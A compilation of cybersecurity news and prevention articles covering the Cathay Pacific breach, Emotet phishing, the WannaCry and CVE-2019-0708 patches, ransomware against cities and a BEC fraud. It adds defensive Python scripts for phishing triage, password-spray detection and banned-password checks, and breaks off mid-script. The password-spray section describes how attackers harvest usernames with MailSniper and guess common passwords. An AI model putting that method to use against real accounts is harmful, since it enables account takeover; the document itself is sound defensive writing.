Hong Kong Privacy Watchdog Orders Cathay to Overhaul IT Systems Over 2018 Data Breach
Hong Kong’s Privacy Commissioner for Personal Data Stephen Kai-yi Wong has ordered Cathay Pacific Airways Limited and Hong Kong Dragon Airlines Limited, collectively referred to as Cathay, to overhaul its IT systems containing personal data of its customers over the 2018 data breach which affected approximately 9.4 million passengers from different parts of the world.
On October 24, 2018, Cathay notified both the public and Hong Kong’s Privacy Commissioner for Personal Data about suspicious activity it had detected on its network on March 13, 2018. According to Cathay, approximately 9.4 million passengers were affected by the incident, specifically members of the company’s frequent flyer programs Asia Miles and Marco Polo Club as well as registered users of Cathay from over 260 locations worldwide. The affected personal data included names, flight numbers and dates, titles, email addresses, membership numbers, addresses and phone numbers.
Customers of both Cathay Pacific Airways Limited and Hong Kong Dragon Airlines Limited, also known as Cathay Dragon, were affected as Cathay Pacific managed and provided information management services to Cathay Dragon. With this set-up, personal data of Cathay Dragon’s passengers reside on Cathay Pacific’s IT System.
The “Data Breach Incident Investigation Report” publicly released by Hong Kong’s Privacy Commissioner for Personal Data – with much of the information coming from Cathay’s own disclosure – identified three cyber incidents on Cathay’s systems: a keylogger attack in October 2014, the exploitation of a known security vulnerability in August 2017 and a brute force attack in March 2018.
The earliest evidence of keylogger malicious software (malware) activity on the company’s system dates from October 15, 2014. A keylogger captures every keystroke made on a computer, including usernames and passwords, and automatically sends the captured data to the attackers for criminal exploitation. It isn’t known how the unknown attacker or attackers initially intruded into the company’s system and dropped the keylogger malware.
According to the report, valid user account login details stolen via the keylogger malware enabled the attackers to move further into the company’s network and drop additional tools to steal domain credentials.
Exploitation of Known Vulnerability Attack
The earliest evidence of suspicious activity in which the attackers exploited a known vulnerability on the company’s internet-facing server dates from August 10, 2017. Exploiting this known vulnerability allowed the attackers to bypass authentication and gain administrative access to the server.
Exploiting the known vulnerability also allowed the attackers to move laterally inside the company’s IT system and install malware and credential harvesting tools. The report did not disclose which vulnerability on the internet-facing server was exploited. It did, however, reveal that this vulnerability had been publicly known as early as 2007.
Brute Force Attack
The earliest evidence of a brute force attack on the company’s system dates from March 13, 2018, when approximately 500 staff users were locked out of their accounts. In a brute force attack, an attacker attempts to find the correct username and password by trial and error. Tools available to attackers automate this guessing using lists of thousands of commonly used usernames and passwords.
Although the keylogger attack happened in October 2014, the exploitation of a known security vulnerability in August 2017 and the brute force attack in March 2018, Cathay only informed the public and Hong Kong’s Privacy Commissioner for Personal Data about the suspicious activity on its network on October 24, 2018. In Hong Kong, however, there is no law that requires organizations such as Cathay to notify the Privacy Commissioner for Personal Data and the affected data subjects of a data breach within a prescribed period of time.
“Cathay did not take all reasonably practicable steps to protect the Affected Passengers’ personal data against unauthorised access in terms of vulnerability management, adoption of effective technical security measures and data governance, contravening DPP 4(1) of Schedule 1 to the Ordinance [Hong Kong’s Personal Data Ordinance],” Wong said.
The Commissioner, in particular, found that Cathay had not taken reasonably practicable steps to avoid exposing the administrator console port of its internet-facing server, which opened the door for the attackers. “Cathay should have applied effective multi-factor authentication to all remote access users for accessing its IT System involving personal data,” the Commissioner said.
Data Breach Prevention
Under Hong Kong’s Personal Data Ordinance, if after an investigation, the Privacy Commissioner for Personal Data finds that a data user is contravening or has contravened a requirement under the Ordinance, the Commissioner may serve on the data user an Enforcement Notice to prevent recurrence of the lapses. The Commissioner’s Enforcement Notice directed Cathay to engage an independent data security expert to “overhaul the systems containing personal data to the effect that these systems are free from known malware and known vulnerabilities”.
The Commissioner also directed Cathay to implement effective multi-factor authentication to all remote users for accessing the company’s IT System involving personal data and to conduct a regular review of remote access privileges.
To prevent a Cathay-like data breach, it’s also important to keep all of your organization’s software, especially server operating systems, up to date, as attackers typically try to exploit known software security vulnerabilities.
Malicious Email Campaigns Geo-Targets Canadian Organizations, Report Says
Canadian organizations are increasingly becoming the targets of cyber-attackers as shown in the recent discovery of nearly 100 malicious email campaigns specifically targeting organizations based in Canada.
In the report "Beyond 'North America' - Threat actors target Canada specifically", Proofpoint researchers reported that between January 1, 2019 and May 1, 2019, threat actors conducted nearly 100 malicious email campaigns that specifically targeted Canadian organizations or were customized for Canadian audiences.
Malicious Email Campaigns
A malicious email campaign, also known as a phishing scam, is a type of cyber-attack that uses email as a weapon. Phishing emails contain malicious attachments or malicious links.
Downloading the malicious attachment or clicking the malicious link can lead to compromise. Victims are tricked into opening the malicious email and downloading the attachment or clicking the link because threat actors use branding that is familiar to the recipients.
In the recent malicious email campaigns detected by Proofpoint researchers, the most affected sectors in Canada were financial services, energy/utilities, manufacturing, healthcare and technology. The researchers also observed that some of the malicious emails were customized for French-speaking recipients in Canada.
In these nearly 100 campaigns, Proofpoint researchers also observed that the threat actors tricked victims into opening the email, downloading the attachment or clicking the link by stealing the branding of several notable Canadian companies and agencies, including national banks, major shipping and logistics organizations and government agencies.
“Emotet in particular, with its frequent region-specific email campaigns, is bringing new attention to geo-targeting in Canada …,” Proofpoint researchers said.
The first version of the malicious software (malware) Emotet, which was first observed in 2014 targeting German and Austrian victims, functioned as a banking trojan – a type of malware designed to steal financial data.
Since then, Emotet has evolved into a powerful malware, with its ability to continuously evolve and update its capabilities for various online criminal activities from information stealing to distributed denial-of-service (DDoS) attacks. In recent years, instead of delivering its own banking trojan, Emotet has delivered third-party banking trojans such as Qbot, The Trick, IcedID and Gootkit.
In 2018, the United States Computer Emergency Readiness Team (US-CERT) issued an alert warning about the dangers of Emotet. "Emotet continues to be among the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors,” US-CERT said. “Emotet infections have cost SLTT governments up to $1 million per incident to remediate.”
One of the reasons why Emotet continues to be among the most costly and destructive malware is its worm-like capability, that is, the ability to spread from computer to computer without any human action.
Emotet has been known to spread from computer to computer without any human interaction by accessing Server Message Block (SMB), an internet standard protocol that Windows uses to share files, printers and serial ports. “Emotet’s access to SMB can result in the infection of entire domains (servers and clients),” US-CERT said.
Emotet is also capable of spreading its own phishing emails without human interaction through the use of an Outlook scraper, a tool that scrapes names and email addresses from the victim’s Outlook accounts and uses them to send additional phishing emails from the compromised accounts.
According to Proofpoint researchers, the threat actor called “TA542” is the primary actor behind Emotet. Proofpoint researchers said that this threat actor is known to use the latest version of Emotet and develops malicious emails specific to given regions in the world.
"TA542 typically distributes high volume email campaigns consisting of hundreds of thousands or even millions of messages targeting all industries,” Proofpoint researchers said. “TA542 is currently one of the most prolific actors in the entire threat landscape. With TA542’s international reach and high volume campaign strategy, we expect Emotet use to continue to grow in the upcoming quarters.”
Even as Emotet has evolved in terms of capabilities, one thing remains constant with this malware: delivery is always via malicious email. As the delivery is always via malicious email, it’s important to protect your organization’s email system from this threat through the following mitigating measures:
Here are additional cyber-security measures in order to block or mitigate the effects of Emotet:
How to Protect Your Organization’s Computers from WannaCry-Like Cyber-Attack
Microsoft recently took an unusual step of rolling out a patch for Windows operating systems that are out of support in an effort to stop a WannaCry-like cyber-attack.
This is the second time in just over 2 years that the technology giant rolled out a patch for Windows operating systems that are out of support. The previous unprecedented patch was rolled out at the height of the WannaCry cyber-attack on May 12, 2017.
According to Microsoft, the latest patch, which was released on May 14, 2019, fixes the security vulnerability in out-of-support versions of Windows, specifically Windows 2003 and Windows XP; as well as versions of Windows that still receive support from Microsoft, specifically Windows 7, Windows Server 2008 R2 and Windows Server 2008.
According to Simon Pope, Director of Incident Response at Microsoft Security Response Center (MSRC), failure to apply the May 14, 2019 patch leaves the above-mentioned out-of-support and in-support versions of Windows vulnerable to a WannaCry-like cyber-attack.
What Is WannaCry?
WannaCry is malicious software (malware) that wreaked havoc on more than 300,000 computers in over 150 countries in less than 24 hours on May 12, 2017. Once a computer is infected with WannaCry, the malware encrypts files on the computer's hard drive, making it impossible for legitimate users to access them, and demands a ransom payment in exchange for the decryption keys that supposedly would unlock the encrypted files.
After infecting one computer, WannaCry spreads itself through the network, infecting other vulnerable devices without any further action from users. Attempts by WannaCry victims to unlock their files by paying the ransom were a useless endeavour, as the malware was written in such a way that it isn’t possible to determine who paid the ransom and who didn’t; as such, there is no way to decrypt on a per-user basis.
Two months prior to the WannaCry cyber-attack, on March 14, 2017, Microsoft had released a patch that fixes the security vulnerability exploited by WannaCry. The patch, however, wasn’t made available to Windows operating systems that were out of support, specifically Windows XP, Windows 8 and Windows Server 2003. At the height of the WannaCry cyber-attack on May 12, 2017, Microsoft took the unusual step of rolling out a patch for these three out-of-support versions of Windows.
The WannaCry malware was able to infect hundreds of thousands of computers in less than 24 hours as a result of these two features: remote code execution and worm capabilities.
Remote code execution is the ability of a malicious actor to access someone else's computer and make malicious changes to this computer regardless of the geographical location of this device. Worm capability, meanwhile, refers to the capability of a malware to spread itself through the network, infecting other vulnerable devices, without user interaction.
The May 14, 2019 patch released by Microsoft fixes the security vulnerability labelled CVE-2019-0708. Like the WannaCry malware, security vulnerability CVE-2019-0708 exhibits remote code execution and worm capabilities.
Pope, Director of Incident Response at Microsoft Security Response Center (MSRC), said in a blog post, that while there’s no evidence that this security vulnerability has been exploited in the wild, it’s highly likely that malicious actors will write an exploit for this vulnerability and include it into their malware.
The security vulnerability, Pope said, is “wormable”, which means that “any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the WannaCry malware spread across the globe in 2017.”
WannaCry, in particular, infects vulnerable Windows operating systems via Server Message Block 1.0 (SMBv1) server – a protocol that enables Windows systems to share files, printers and serial ports. In vulnerability CVE-2019-0708, remote code execution and worm capabilities are made possible via Remote Desktop Protocol (RDP) – a proprietary protocol developed by Microsoft which allows users to access another computer over a network connection. “The Remote Desktop Protocol (RDP) itself is not vulnerable,” Pope said. “This vulnerability is pre-authentication ….”
Much malware in the past has been able to bypass anti-malware and other security defences via RDP. Malicious actors gain access to compromised devices by stealing or brute forcing RDP credentials.
In early 2019, authorities shut down xDedic Marketplace, a website involved in the illicit sale of RDP credentials. According to authorities, RDP login details of tens of thousands of compromised servers owned by unknowing companies and private individuals were sold on the xDedic platform for amounts ranging from $6 to more than $10,000 each.
The top preventive measure to protect your organization’s computers from WannaCry and WannaCry-like cyber-attacks is to keep all software, and in particular operating system software, up to date.
It’s worth noting that even though it has been a long time since the major WannaCry attack, organizations continue to be victimized by this malware. Months after the major WannaCry attack, US aircraft maker Boeing fell victim to WannaCry. In March 2018, Mike VanderWel, chief engineer at Boeing Commercial Airplane production engineering, sent out an alert to his colleagues that the WannaCry malware was “metastasizing rapidly” out of Boeing’s North Charleston production plant and could potentially “spread to airplane software”. Linda Mills, head of communications for Boeing Commercial Airplanes, said in a statement, “The vulnerability was limited to a few machines.”
As added protection for your organization’s computers, it’s best to disable Windows protocols that are often exploited by malicious actors. Specific to the WannaCry malware, disable the SMB protocol; for the security vulnerability CVE-2019-0708, disable RDP.
Retargeted Attacks Continue to Rise
Once a target, always a target. This seems to be the case in the City of Baltimore in Maryland as the City recently suffered another cyber-attack – the second attack in just over a year.
On May 7, Baltimore Mayor Bernard Jack Young announced that the City’s network had been infected with ransomware. As a precaution, he said, the City shut down the majority of its servers. While the City’s essential services such as the police and fire departments remained operational, the ransomware infection and the resulting shutdown of most servers caused network, email and phone outages, with nearly every other City department affected.
Just over a year ago, in March 2018, the City of Baltimore suffered another cyber-attack. The 2018 attack was, however, limited to Baltimore's computer network that supports emergency calls. The attack forced the staff to resort to manual operations to handle calls.
Baltimore Chief Information Officer and Chief Digital Officer Frank Johnson told Ars Technica that the 2018 cyber-attack, which brought down Baltimore's computer-aided dispatch (CAD) system, was caused by ransomware. The exact type of ransomware that hit Baltimore’s CAD system wasn’t revealed.
The point of entry of the ransomware was, however, partially identified. According to Johnson, the Baltimore City Information Technology office determined that "the vulnerability was the result of an internal change to the firewall by a technician who was troubleshooting an unrelated communication issue within the CAD System”.
In a press conference, Baltimore Chief Information Officer and Chief Digital Officer Johnson said that the recent cyber attack on Baltimore’s system was caused by the “very aggressive RobinHood ransomware".
Ransomware is a type of malicious software (malware) that locks out computer users by encrypting computer systems or files and demands from victims ransom payment in exchange for the decryption keys that would unlock the encrypted computer systems or files.
RobinHood ransomware is a fairly new malware. Last month, in early April, the RobinHood ransomware similarly infected the network of the City of Greenville, South Carolina, which prompted the City to shut down the majority of its servers.
In late April, security researcher Vitali Kremez reverse engineered a sample of the RobinHood ransomware. Kremez told BleepingComputer that on execution, this malware stops 181 Windows services associated with antivirus and other software that could keep files open and prevent their encryption. This ransomware also doesn’t spread within the network, which means that every infected computer is individually targeted.
Kremez, meanwhile, told Ars Technica that the RobinHood ransomware attacker or attackers need administrative-level access to a system on the network “due to the way the ransomware interacts with C:\Windows\Temp directory”. It’s still unknown how the RobinHood ransomware gains access to a network and the computers connected to it.
The RobinHood ransomware drops its ransom note on the desktop, informing victims that 3 bitcoins must be paid for the decryption key of one computer, or alternatively 13 bitcoins for the decryption keys of the entire infected system. The ransom note also states that the cost increases by “$10,000 each day after the fourth day.” The value of 1 bitcoin as of May 11, 2019 4PM GMT+7 was $6,312.
Prevalence of Retargeted Cyber Attacks
A study conducted by FireEye Mandiant found that organizations that have been breached before are much more likely to be targeted again. In 2017, FireEye Mandiant reported that 56% of victims of at least one significant cyber-attack were targeted again by the same or a similarly motivated attack group. In 2018, this number continued to climb, increasing to 64%, FireEye Mandiant reported.
The top 5 retargeted industries in 2018 were finance (18%), education (13%), health (11%), pharmaceutical (9%), retail and hospitality (7%), and telecommunications (7%).
The FireEye Mandiant report further found that in 2018, organizations in the Asia-Pacific (APAC) region were far more likely to succumb to retargeted attacks, with 78% of APAC organizations falling victim to another attack. For the same period, the report found that 63% of organizations in the Americas and 57% of organizations in Europe, the Middle East and Africa (EMEA) fell victim to another attack.
"This data further substantiates the fact that if you’ve been breached, you are much more likely to be targeted again and possibly suffer another breach," FireEye Mandiant said.
How to Prevent Retargeted Attacks
Configuring ordinary workstations not to install software and establishing a separate device or devices exclusively for administrative tasks (for installing and removing software and changing configuration settings) are two preventive measures in reducing the odds of malicious actors gaining access into your organization’s network.
Configuring ordinary workstations not to install software is a proactive means of preventing accidental installation of malicious software by unwittingly downloading malicious attachments or clicking on malicious links contained inside malicious emails.
Devices exclusively used for administrative tasks, meanwhile, should be secured through the following:
Why Local Government Offices Are Targeted by Cyber Attackers and How to Prevent Such Attacks
In recent months, a concerning number of local governments in Ontario, Canada have openly admitted that they have been victims of cyber-attacks. What could have caused these attacks? And what can be done to prevent these attacks?
Town of Wasaga Beach
The Town of Wasaga Beach, Ontario admitted that on April 30, 2018, several of its servers were illegally accessed and infected with ransomware – a type of malicious software (malware) that encrypts computer systems and files, locking out users, and demands a ransom payment in exchange for the keys that would decrypt or unlock them.
It took the Town of Wasaga Beach approximately 7 weeks to fully recover from the ransomware attack, and as a result the Town lost hundreds of thousands of Canadian dollars: 3 bitcoins, valued at $34,950 Canadian at the time of payment, were paid to the ransomware attackers, and the bulk of the cost went to internal productivity losses totalling $251,759 Canadian.
Town of Midland
The Town of Midland, Ontario admitted that on September 1, 2018, its network was illegally accessed and infected with ransomware. Six days later, on September 6, 2018, the Town of Midland announced that it had initiated the process of paying the ransom demanded by the attackers. How much was paid to the attackers wasn’t specified.
In exchange for the decryption keys, the Town said that it “initiated the process to pay the ransom.” The Town added, “Although not ideal, it is in our best interest to bring the system back online as quickly as possible.”
City of Stratford
The City of Stratford, Ontario admitted that on April 14 this year, its computer systems were illegally accessed and infected with an unspecified virus – a type of malware that spreads by attaching itself to legitimate computer files and programs and is distributed via infected flash drives, emails or websites. This unspecified virus, the City said, encrypted computer systems and files and locked out users.
“We have now begun methodically unlocking and decrypting our systems,” the City said. “This is a thorough process that takes days, not hours.”
A computer virus that locks users out through encryption and requires decryption to unlock is typical of ransomware. The decryption key or keys used to unlock the systems or files are handed over by the ransomware attackers. In the case of the City of Stratford, it wasn’t specified whether or not a ransom was paid to the attackers.
City of Ottawa
On April 8, 2019, it was revealed that the City of Ottawa, Ontario fell victim to a common fraud scheme called “Business Email Compromise (BEC)” scam. The City's Office of the Auditor General reported that US$97,797 was transferred to an account of a phony supplier as a result of the BEC scam – a cyber attack that targets organizations that conduct wire transfers for its suppliers. In a BEC scam, email accounts of executives or high-level employees are either spoofed or compromised for the purpose of fraudulent wire transfers, resulting in hundreds of thousands of dollars in losses.
“On July 6, 2018, the General Manager, Corporate Services and City Treasurer (the ‘City Treasurer’), received an email (the ‘Email’) apparently from the City Manager,” the Office of the Auditor General said. “The Email, which was later identified as a spoofed email, requested that a wire transfer in the amount of US$97,797.20 (the ‘Funds’) be processed for the completion of an acquisition. With the City Treasurer’s approval, later that day the request was processed, and the Funds were issued.”
A portion of the City’s funds ended up in a bank account that the U.S. Secret Service monitored and seized. It’s unclear how much, if any, might eventually be recovered by the City of Ottawa from this seized bank account.
Local governments are targeted by cyber criminals because they hold troves of sensitive data, from government licenses to government contracts. The fact that local governments have the financial capacity to pay also makes them attractive targets, and the willingness of some local governments to pay attackers compounds this growing problem.
The growing number of cyber attacks, in particular ransomware attacks, against local government offices within Ontario prompted the Ontario Provincial Police (OPP) to issue a ransomware alert. On the question of paying attackers a ransom, the OPP said, “The OPP does not support paying ransomware attackers, as it only encourages further criminal activity, and there is no guarantee that payment will restore the encrypted data.”
Here are some cybersecurity best practices in order to prevent or mitigate the effects of cyber attacks:
Mind the Emails
Many of today’s cyber criminals use email as a means to infiltrate the IT systems of organizations. Many ransomware attacks are carried out through malicious emails containing malicious attachments or links. Opening a malicious attachment or clicking a malicious link can allow the installation of malicious software on your organization’s systems.
BEC scammers, meanwhile, rely mainly on email to perpetrate their fraud. In both ransomware attacks and BEC scams, attackers use email as their weapon.
It’s, therefore, important to have an automated email solution that could identify and block emails with malicious attachments or links as well as identify and block spoofed or compromised emails. It’s also important to train your organization’s staff to identify and block malicious and fraudulent emails.
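As an added illustration of what such an automated email check can look at, the following Python script (written for this page; it is not code from any vendor, from the City of Ottawa or from the Office of the Auditor General) triages a raw message for the indicators behind the spoofed-email case and the ransomware lures described above: an executive’s display name on an external address, a Reply-To pointing somewhere else, failed SPF/DKIM/DMARC results stamped by the receiving mail server, wire-transfer wording, and executable or macro-enabled attachments. The organization domain, the executive list and the three sample messages are all constructed.

```python
"""Triage an inbound message for BEC and phishing indicators.

Added example, not code from the original article. The organisation domains,
the executive list, the risky-extension list and the three sample messages are
all constructed for illustration.
"""
import email
import re
from email import policy
from email.utils import parseaddr

ORG_DOMAINS = {"example-city.ca"}                        # hypothetical organisation
EXECUTIVES = {"jane doe": "jane.doe@example-city.ca"}   # display name -> real mailbox
RISKY_EXTENSIONS = {".exe", ".js", ".vbs", ".scr", ".hta", ".lnk", ".jar", ".docm", ".xlsm"}
FAILED_AUTH = {"fail", "softfail", "permerror", "temperror"}
LURE_WORDS = re.compile(r"wire transfer|urgent|confidential|acquisition", re.I)


def _domain(addr):
    """Lower-cased domain part of an address, or '' if there is none."""
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def analyze_message(raw):
    """Return the sender, a list of findings and a deliver/quarantine verdict."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []

    from_name, from_addr = parseaddr(msg.get("From", ""))
    from_domain = _domain(from_addr)
    name_key = from_name.strip().lower()

    # 1. Display-name spoofing: a known executive's name on an external address.
    if name_key in EXECUTIVES and from_domain not in ORG_DOMAINS:
        findings.append(f"display name '{from_name}' impersonates "
                        f"{EXECUTIVES[name_key]} from external domain {from_domain}")

    # 2. Reply-To routed to a different domain than the visible sender.
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    if reply_addr and _domain(reply_addr) != from_domain:
        findings.append(f"Reply-To domain {_domain(reply_addr)} differs from From domain {from_domain}")

    # 3. SPF/DKIM/DMARC results stamped by the receiving mail server.
    auth = msg.get("Authentication-Results", "")
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", auth)
        if m and m.group(1).lower() in FAILED_AUTH:
            findings.append(f"{mech}={m.group(1).lower()}")

    # 4. Payment/urgency wording typical of BEC lures.
    body = msg.get_body(preferencelist=("plain",))
    if body is not None and LURE_WORDS.search(body.get_content()):
        findings.append("body contains payment/urgency keywords")

    # 5. Attachment types that can execute code or carry macros.
    for part in msg.iter_attachments():
        fname = part.get_filename() or ""
        ext = "." + fname.rsplit(".", 1)[-1].lower() if "." in fname else ""
        if ext in RISKY_EXTENSIONS:
            findings.append(f"risky attachment {fname}")

    return {"from": from_addr, "findings": findings,
            "verdict": "quarantine" if findings else "deliver"}


# Constructed sample 1: a spoofed "from the executive" wire-transfer request.
SPOOFED_BEC = b"""From: Jane Doe <jane.doe@example-city-mail.com>
To: treasurer@example-city.ca
Reply-To: Jane Doe <j.doe@freemail-example.net>
Subject: Wire transfer needed today
Authentication-Results: mx.example-city.ca; spf=fail smtp.mailfrom=example-city-mail.com; dkim=none; dmarc=fail
Content-Type: text/plain; charset="utf-8"

Please process an urgent wire transfer today to complete the acquisition. Keep this confidential.
"""

# Constructed sample 2: a genuine internal message.
LEGITIMATE = b"""From: Jane Doe <jane.doe@example-city.ca>
To: treasurer@example-city.ca
Subject: Council agenda
Authentication-Results: mx.example-city.ca; spf=pass; dkim=pass; dmarc=pass
Content-Type: text/plain; charset="utf-8"

Below is the agenda for Monday's council meeting.
"""

# Constructed sample 3: a delivery-notice lure carrying a macro-enabled document.
MACRO_LURE = b"""From: Parcel Notice <notice@courier-example.net>
To: staff@example-city.ca
Subject: Delivery notice
Authentication-Results: mx.example-city.ca; spf=pass; dkim=pass; dmarc=pass
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Your parcel could not be delivered. Open the attached notice to reschedule.
--b1
Content-Type: application/octet-stream; name="notice.docm"
Content-Disposition: attachment; filename="notice.docm"
Content-Transfer-Encoding: base64

UEsDBBQ=
--b1--
"""

if __name__ == "__main__":
    for sample in (SPOOFED_BEC, LEGITIMATE, MACRO_LURE):
        print(analyze_message(sample))
```

Run the file directly to see each sample’s findings and verdict. The keyword check is deliberately crude and only backs up the stronger signals; the authentication results are meaningful only if your own domain publishes SPF and DKIM and a DMARC policy, which is what lets the receiving server mark a spoofed internal sender as a failure in the first place.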
Backup Important Files
Organizations that entertain the idea of negotiating with cyber attackers are those with weak backup systems. If your organization regularly backs up its important files, there’s no reason to negotiate with or pay the attackers for the locked or stolen data.
What Is Password Spray Attack and How to Prevent It
VPN provider Citrix, whose clientele includes more than 400,000 organizations, including 98% of the Fortune 500 companies, recently disclosed that cybercriminals gained access to its internal network and downloaded business documents.
According to the Federal Bureau of Investigation (FBI), which informed Citrix about the intrusion, the attackers likely used a tactic known as password spray to gain a foothold with limited access to Citrix’s network and then worked to circumvent additional layers of security.
What Is Password Spray Attack?
Password spray is a type of cyberattack that attempts to access a large number of usernames (accounts) using commonly used passwords. This type of attack is also known as the low-and-slow method: the attacker first attempts to log in with a single commonly used password against many usernames. If that password is incorrect for all of them, the attacker moves on to a different password, leaving sufficient time between rounds so as not to trigger any time-based account lockout thresholds.
Attackers, for instance, can easily obtain all usernames of a given organization using the tool MailSniper and then attempt to log in using the commonly used password “P@$$w0rd” on all of them; if this password fails, after a sufficient time interval they try another commonly used password, “Password1”, and so on.
Password spray is a stealthy form of cyberattack that evades most detection techniques. To the legitimate user or the organization, login attempts that are part of a password spray attack look like isolated failed logins.
On the part of the attackers, password spray attack is a numbers game. Even though commonly used passwords are used only by 0.5-1.0% of accounts, one successful attempt for every thousand accounts attacked is enough as this one successful attempt has a multiplying effect. Successful access to one account allows attackers to harvest further information.
A study conducted by the UK National Cyber Security Centre (NCSC) showed that 75% of the participating UK-based organizations had accounts with passwords that featured in the top 1,000 passwords, and 87% had accounts with passwords that featured in the top 10,000.
"This data suggests that password spraying attacks are likely to have some success against these organizations, and many other organizations across the UK,” NCSC said. “Whilst account lockout policies may limit attackers to trying (for example) 10 passwords against a single account per day, the account lockout counters usually reset over time. This allows persistent attackers to try more passwords, and they can (and do) end up trying hundreds or even thousands of common passwords.”
The recent cyberattack on Citrix via password spray shows that cybercriminals are increasingly using this form of cyberattack against organizations worldwide. In March 2018, the U.S. Department of Homeland Security (DHS) and the FBI released a joint alert warning the public about the growing threat of password spray attacks.
Passwords aren’t just used for email. They’re also used in single sign-on (SSO) or web-based applications with a federated authentication method. According to DHS and FBI, victims of password spray attacks often use SSO or web-based applications with federated authentication. DHS and FBI added that the vast majority of known password spray victims share some of the following characteristics:
In March 2018, the FBI announced hacking-related charges against nine Iranians. The FBI said the accused conducted a 4-year campaign that compromised nearly 144 U.S.-based universities and 176 foreign universities in 21 countries. In addition to the compromised universities, the FBI said 50 U.S. and foreign private companies, the states of Hawaii and Indiana and the United Nations were compromised by the accused as well.
Over 30 terabytes of academic data and intellectual property, equivalent to 3 times the amount of data contained in the print collection of the Library of Congress, were stolen by the accused, the FBI said.
According to the FBI, the accused compromised their victims through password spray attacks. “They were flying under the radar,” said the FBI agent who investigated the case, “and the magnitude of their effort was remarkable.”
How to Prevent Password Spray Attacks
While password spray attacks can go undetected by network security controls, there are, however, indicators of this type of cyberattack. Indicators of password spray attacks include a rise in attempted logins against the enterprise SSO portal or web-based application, and employee logins from IP addresses resolving to locations that are not consistent with their normal locations.
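The indicators above translate into a simple detection rule: one source address producing a small number of failures against many distinct accounts inside a window, which per-account lockout counters never see. The following is an added example written for this article (not code from the original post, DHS/FBI or NCSC); the CSV log format (timestamp,username,source_ip,result), the sample lines and the thresholds are all constructed assumptions, and a real SSO portal's export would need its own parser.

```python
"""Low-and-slow password spray detector over SSO authentication log lines.

Added illustrative example. The log format is a constructed, simplified
SSO-style CSV: timestamp,username,source_ip,result.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one failure per account from 203.0.113.10, spaced out so
# that no per-account lockout threshold is reached, followed by one success.
# 198.51.100.x are ordinary users mistyping a password once and then succeeding.
SAMPLE_LOG = """\
2019-03-01T02:00:05Z,alice,203.0.113.10,FAIL
2019-03-01T02:00:19Z,bob,203.0.113.10,FAIL
2019-03-01T02:00:33Z,carol,203.0.113.10,FAIL
2019-03-01T02:00:47Z,dave,203.0.113.10,FAIL
2019-03-01T02:01:01Z,erin,203.0.113.10,FAIL
2019-03-01T02:01:15Z,frank,203.0.113.10,FAIL
2019-03-01T02:01:29Z,grace,203.0.113.10,SUCCESS
2019-03-01T09:15:00Z,alice,198.51.100.7,FAIL
2019-03-01T09:15:08Z,alice,198.51.100.7,SUCCESS
2019-03-01T09:20:00Z,bob,198.51.100.8,SUCCESS
"""


def parse_log(text):
    """Parse the constructed CSV into (timestamp, user, source_ip, result) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, ip, result = line.split(",")
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), user, ip, result))
    return events


def detect_spray(events, window=timedelta(minutes=30), min_accounts=5, max_fail_per_account=2):
    """Return {source_ip: details} for source IPs whose failed logins in some
    sliding window touch at least `min_accounts` distinct accounts while no
    single account sees more than `max_fail_per_account` failures: many
    accounts, few attempts each, which is exactly what a lockout policy misses.
    """
    failures_by_ip = defaultdict(list)
    for ts, user, ip, result in events:
        if result == "FAIL":
            failures_by_ip[ip].append((ts, user))

    hits = {}
    for ip, fails in failures_by_ip.items():
        fails.sort()
        for i, (start, _) in enumerate(fails):
            per_user = defaultdict(int)
            for ts, user in fails[i:]:
                if ts - start > window:
                    break
                per_user[user] += 1
            if len(per_user) >= min_accounts and max(per_user.values()) <= max_fail_per_account:
                # Accounts that authenticated successfully from the spraying IP
                # are the ones to review and reset first.
                successes = sorted({u for ts, u, src, r in events if src == ip and r == "SUCCESS"})
                hits[ip] = {"accounts": sorted(per_user), "window_start": start, "successes": successes}
                break
    return hits


if __name__ == "__main__":
    for ip, info in detect_spray(parse_log(SAMPLE_LOG)).items():
        print(ip, "sprayed", len(info["accounts"]), "accounts; successes:", info["successes"])
```

The thresholds (five accounts in thirty minutes, at most two failures each) are deliberately low for the sample; in production they are tuned against the portal's normal failure rate, and the same grouping is worth repeating per /24 or per ASN, since attackers rotate source addresses.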
Here are some measures aimed at deterring password spray attacks:
Using MFA on all active, internet-facing protocols is one way to deter password spray attacks. So long as passwords exist, attackers will keep guessing them. MFA is a means to distinguish the legitimate account owner from an attacker.
Banning commonly used passwords is another means to deter password spray attacks. Every password creation, change or reset should run through a banned-password checker containing a list of words that no one should ever have in their password.
Password spray attacks exist because of passwords. When passwords aren’t used at all, there are no passwords for attackers to guess. Instead of passwords, use non-password-based authentication methods.
For instance, Windows Server 2016 enables completely password-free access based on strong cryptographic keys tied to both the user and the device.
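A banned-password checker is only useful if it sees through the substitutions users make, which is why “P@$$w0rd” and “Password1” from the spray example above must both be rejected. The following is an added example (not code from the article or from any vendor it names): the banned list is a small constructed sample standing in for a published top-N list, and the normalization rules and the 60% containment heuristic are assumptions.

```python
"""Banned-password checker to run on every password creation, change or reset.

Added illustrative example. The banned list is a constructed sample; a real
deployment loads a large published common-password list.
"""
import re

BANNED_BASE_WORDS = {"password", "welcome", "letmein", "qwerty", "summer", "companyname"}

# Character substitutions users commonly make to slip past naive blocklists.
LEET_MAP = str.maketrans({"@": "a", "$": "s", "0": "o", "1": "i", "!": "i",
                          "3": "e", "4": "a", "5": "s", "7": "t"})


def normalize(password):
    """Fold case, drop a trailing run of digits/symbols (the '2019!' habit),
    undo common leetspeak, then drop anything that still is not a letter, so
    that 'P@$$w0rd', 'Password1' and 'password2019!' all reduce to 'password'."""
    p = password.lower()
    p = re.sub(r"[^a-z]+$", "", p)
    p = p.translate(LEET_MAP)
    return re.sub(r"[^a-z]", "", p)


def is_banned(password, banned=BANNED_BASE_WORDS):
    base = normalize(password)
    if not base:
        return True  # nothing but digits and symbols
    if base in banned:
        return True
    # Assumption: a banned word making up at least 60% of the normalized
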